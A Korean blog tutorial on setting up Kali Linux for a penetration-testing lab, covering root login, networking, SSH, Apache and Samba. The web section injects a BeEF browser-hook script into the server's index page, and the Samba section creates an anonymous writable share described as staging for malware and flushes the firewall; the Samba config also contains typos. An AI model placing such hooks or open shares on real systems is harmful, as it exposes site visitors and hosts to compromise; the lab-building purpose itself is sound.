리눅스

[Linux] 칼리리눅스 초기설정(모의침투용 환경구축)

화이트해커 Luna 🌙 2023. 1. 21. 05:58
728x90
반응형

칼리리눅스 초기설정(모의침투용 환경구축)

 

 

-목차-
1. 계정활성화
2. 네트워크설정
3. 한글설치
4. SSH 설치
5. 웹서비스 구축
6. 삼바 서비스 구축

 


 

1. 계정활성화

 

루트계정을 활성화

 

# sudo passwd root
# su -

 

 


 

2. 네트워크설정

 

유동IP를 고정IP로 바꾼다. 

 

# vi /etc/network/interfaces
# vi /etc/resolv.conf
# apt-get update
# apt-get upgrade

 

 


3. 한글설치

 

# apt-get install im-config nabi fonts-nanum*
# im-config
# sync
# reboot

 

 

 

 

 

 


4. SSH 설치

 

Secure Shell에서 원격접속을 하기위함

 

# apt-get install openssh-server
# service ssh start
# update-rc.d ssh enable

 


5. 웹서비스 구축

이건 왜 만드는거냐면 BeEF 도구를 이용하기 위해서다. 

# cp /var/www/html/index.html /root/
# cat > /var/www/html/index.html       
^C //Ctrl+c
# vi /var/www/html/index.html
<!DOCTYPE html>
<html>
<head>
<title></title>
<meta charset="utf-8">
<link rel="stylesheet" href="# ">
<script src="stylesheet" href="# ">
<script src="http://192.168.10.220:3000/hook.js"></script>
</head>
<body>
</body>
</html>
# vi /etc/apache2/apache2.conf 
# cat /etc/apache2/apache2.conf -n | egrep "/var/www/html" 
   170  <Directory /var/www/html>

 

 


6. 삼바 서비스 구축

 

악성코드 생성과 실행을 위해서 미리 구축해둔다. 

 

# apt-get install samba smbclient cifs-utils -y
# vi /etc/samba/smb.conf 
[global]
workgroup = WORKGROUP
server string = Samba Server %v
netbios naim = debian
security = uuser
# security = share
map to guest = bad user
dns proxy = no

[printers]
comment = All Printers
path = /var/spool/samba
browseable = yes
guest ok = yes
writable = yes
printable = yes

[anonymous]
path = /tmp/
browseable = yes
writable = yes
guest ok = yes
read only = no

# iptables -F && iptables -L //IPTables 소프트웨어방화벽설정 초기화
# service smbd restart
# netstat -tanp | grep smbd  
# update-rc.d smbd enable
# service smbd status
# nmap 127.0.0.1 //포트스캔

 

 

 

 

 


문의는 댓글 남겨주세요

728x90
반응형